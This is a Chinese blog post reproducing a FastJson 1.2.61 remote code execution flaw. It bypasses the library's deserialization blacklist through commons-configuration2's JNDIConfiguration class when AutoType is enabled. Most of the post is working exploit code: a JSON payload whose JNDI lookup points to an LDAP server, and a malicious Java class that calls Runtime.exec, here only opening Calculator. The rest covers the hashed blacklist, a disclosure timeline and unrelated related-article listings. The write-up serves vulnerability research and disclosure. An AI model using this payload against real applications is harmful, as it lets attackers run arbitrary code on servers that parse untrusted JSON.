commons-pool2-2.3 jar包_[漏洞复现]FastJson 1.2.61远程代码执行漏洞(From第三方jar包)

最新推荐文章于 2022-06-21 12:11:59 发布
最新推荐文章于 2022-06-21 12:11:59 发布
阅读量191 收藏
点赞数
文章标签: commons-pool2-2.3 jar包 把代码打成jar包给第三方

前言

最近FastJson更新了黑名单,升级到了1.2.61版本,我尝试bypass其黑名单,在AutType打开的情况下成功绕过了黑名单防护.(目前暂未修复,官方即将更新)

复现环境准备

  • 1.JDK 8U20

  • 2.所需jar清单如下

fastjson-1.2.61.jar
commons-configuration2-2.0.jar
commons-lang3-3.3.2.jar
commons-logging-1.2.jar

FastJson复现

FastJsonTest.java

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastJsonTest {
public static void main(String[] args){

        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        String jsonStr6 = "{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"ldap://127.0.0.1:1389/ExportObject\"}";

        JSONObject json = JSON.parseObject(jsonStr6);
        json.toJSONString();
    }
}

恶意类ExportObject.java

import java.io.BufferedReader;
import java.io.InputStreamReader;

public class ExportObject {
public ExportObject() throws Exception {
        Process proc = Runtime.getRuntime().exec("open /Applications/Calculator.app");
        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
        StringBuffer sb = new StringBuffer();

        String line;
while((line = br.readLine()) != null) {
            sb.append(line).append("\n");
        }

        String result = sb.toString();
        Exception e = new Exception(result);
throw e;
    }

public static void main(String[] args) throws Exception {
    }
}

使用org.apache.commons.configuration2.JNDIConfiguration payload 效果如下

68206282e7f15bb9e3df9db3c097b8fa.png

关于黑名单

Fastjson 在1.2.42版本开始,将原本明文的黑名单改成了hash value的黑名单

37dc2f86f1a744fa4d71077442073662.png

使用这种方式,能在一定程度上减缓安全研究者对fastjson黑名单绕过的速度
关于黑名单,有安全研究者在GitHub上开源了一个项目,叫做fastjson-blacklist,大家可以关注一下.

ad0e5d4f43cf688c54f96146d1b81068.png

后记

对于不会开启rmi和ldap服务的同学可以查阅我的文章——《如何快速开启RMI&&LDAP》,快速开启http服务可以使用python -m SimpleHTTPServer.
使用JNDI进行rce,请注意JDK对于JNDI的修复,可参考pyn3rd师傅的图

e612fdf62baece52bf61c2d272dd558e.png

Reference

fastjson-blacklist:
https://github.com/LeadroyaL/fastjson-blacklist/](https://github.com/LeadroyaL/fastjson-blacklist/
fastjson官方黑名单:
https://github.com/alibaba/fastjson/blob/master/src/main/java/com/alibaba/fastjson/parser/ParserConfig.java
如何快速开启RMI&&LDAP:
https://mp.weixin.qq.com/s/TuQWvyro5vphyeZCAo_Y6g

时间轴

[0] 2019年9月20日 亚信安全提交该漏洞给阿里巴巴
[1] 2019年9月23日 亚信安全网络攻防实验室发布预警公告

weixin_39547596
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
commons-dbcp +commons-pool
08-16
commons-dbcp +commons-pool
fastjson jar包_【安全预警】FastJson <= 1.2.61反序列化漏洞
weixin_39859988的博客
11-28 173
↑ 点击上方蓝色字关注我们Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。由于是目前解析JSON最快的开源库,因此应用非常广泛。Fastjson采取黑名单的机制修补反序列化漏洞,并在近日更新了黑名单,在安全研究员的发掘下,找到了一种新的利用方式,可以由此绕过黑...
解决:Dependency ‘com.alibaba:fastjson:1.2.61‘ not found
young_man2的博客
06-21 2712
解决:Dependency ‘com.alibaba:fastjson:1.2.61‘ not found
commons-pool2-2.3 jar包_GitLab 13.3发布,多语言SAST和包注册表
weixin_39954464的博客
11-29 885
日前,Gitlab发布了新的月度版本13.3。本次版本的核心在于通过DevSecOps帮助团队在软件开发过程的早期检测并解决故障和漏洞。GitLab 13.3中,新增加了在开发流程中的模糊测试使构建安全软件更加容易。通过覆盖率指导的模糊测试和按需DAST可以更快更及时的发现软件漏洞。同时,使用新的CI/CD构建矩阵,可以更轻松地更频繁地释放代码。更多功能请和虫虫一起学习。概述尽早发现并预防缺陷和漏...
Fastjson jar包下载地址
热门推荐
资源分享免费的博客
12-14 2万+
Fastjsonjar包下载地址
commons-pool2-2.3-API文档-中文版.zip
04-23
赠送jar包commons-pool2-2.3.jar; 赠送原API文档:commons-pool2-2.3-javadoc.jar; 赠送源代码commons-pool2-2.3-sources.jar; 赠送Maven依赖信息文件:commons-pool2-2.3.pom; 包含翻译后的API文档:...
commons-dbcp2-2.4.0.jar commons-pool2-2.4.2.jar等6个jar包
最新发布
06-28
web-5.2.6.RELEASE.jar、spring-jdbc-5.2.6.RELEASE.jar、mysql-connector-java-5.1.37-bin.jar、mybatis-spring-1.3.1.jarcommons-dbcp2-2.4.0.jarcommons-pool2-2.4.2.jar等6个jar包
jedis-2.7.0.jarcommons-pool2-2.3.jar
07-04
commons-pool2-2.3.jar commons-pool2.jar是一个十分常用的jar文件,commons-pool2.jar文件适用于java开发中的与连接池进行连接部分使用,如果您缺少这个jar文件马上下载commons-pool2.jar
commons-pool2-2.3.jar中文-英文对照文档.zip
03-11
中文-英文对照文档,中英对照文档,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册 # 使用方法: 解压 【***.jar中文文档.zip】,再解压其中的 【***-...
jedis-3.2.0.jar + commons-pool2-2.6.2.jar
09-23
标题中的"jedis-3.2.0.jar + commons-pool2-2.6.2.jar"提到了两个关键的Java库:Jedis和Apache Commons Pool2。Jedis是Java编程语言中广泛使用的Redis客户端,而Apache Commons Pool2则是一个对象池实现,用于有效地...
comcommons-pool2-2.0.jar
05-16
jedis-2.4.2.jarcomcommons-pool2-2.0.jar一起使用
fastjson 1.2.6
06-09
fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。 主要特点: 快速FAST (比其它任何基于Java的解析器和生成器更快,包括jackson) 强大(支持普通JDK类包括任意Java Bean Class、Collection、Map、Date或enum) 零依赖(没有依赖其它任何类库除了JDK)
fastjson-1.2.60.jar
09-10
阿里巴巴fastjson 1.2.60最新版,号称最快的json解析,2019年8月更新,修复拒绝服务安全问题。
commons-pool2-2.6.2.jar
04-22
Redis 的Cluster集群搭建依赖的jar,优秀的开源对象池化组件apache-commons-pool2,它对对象池化操作进行了很好的封装,我们只需要根据自己的业务需求重写或实现部分接口即可,使用它可以快速的创建一个方便,简单,强大对象连接池管理类。
struts2核心jar包漏洞已经修复)
08-24
struts2核心jar包漏洞已经修复)
common pool 数据库连接池泄露排查
qq_36407469的博客
09-15 1733
一次服务上线没多久,页面处于刷新状态,系统发生假死,查看后台日志,并未发现任何的异常信息,在请求接口处增加debug日志后发现,程序在执行到数据库查询相关的地方卡死了。 怀疑是数据库连接的问题,但是使用Navicat连接数据库正常。通过jstack导出线程快照发现, jstack <pid> >> jstack.log 大量处于WAITTING状态的线程,而这些线程都是在调用borrowObject方法,这个是apache common...
利用commons-pool2自定义对象池
lan墨的博客
05-12 1万+
利用commons-pool2自定义资源池 commons-pool2是Apache下一个开源的公共资源池。我们可以根据它来快速的建立一个自己的资源池。 1. 相关概念: 此处连接池并不单指链接对象的池子,泛指某一对象的对象池.通常打开或者关闭一个链接是十分耗时的事情,如果能将链接缓存起来重复使用就能节省很多时间. 链接池/对象池(ObjectPool):用于存放链接对象的一个池子(集合
commons-pool2-2.3 jar包_[漏洞复现]FastJson 1.2.60远程代码执行漏洞(From第三方jar包)
weixin_39972264的博客
11-28 268
前言最近有安全从业者——浅蓝色de忧伤在Freebuf发表了一文「抽象语法树分析寻找FastJSON的Gadgets」.根据他的文章两个FastJson用以JNDI注入的gadget随之公布,但目前FastJson官方并未将这两个gadget打入黑名单.复现环境准备1.JDK 8U202.所需jar清单如下fastjson-1.2.60.jarcommons-configuration-...
Redis连接池---jedis-2.9.0+commons-pool2-2.4.2
wangshuang1631的博客
01-05 1万+
首先,导入jedis-2.9.0.jarcommons-pool2-2.4.2.jar包。 我在做测试时,忘记导入commons-pool2-2.4.2.jar,报了如下错误:The type org.apache.commons.pool2.impl.GenericObjectPoolConfig cannot be resolved. It is indirectly referenced
commons-dbcp2-2.7.0.jarcommons-logging-1.2.jar以 及commons-pool2-2.8.0.jar在哪个网站可以下载
05-11
你可以在Apache官网的下载页面上找到这些jar包的下载链接,具体步骤如下: 1. 打开Apache官网:https://www.apache.org/ 2. 点击页面上方的"Downloads"链接 3. 在Downloads页面上,可以搜索或浏览各种Apache项目和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值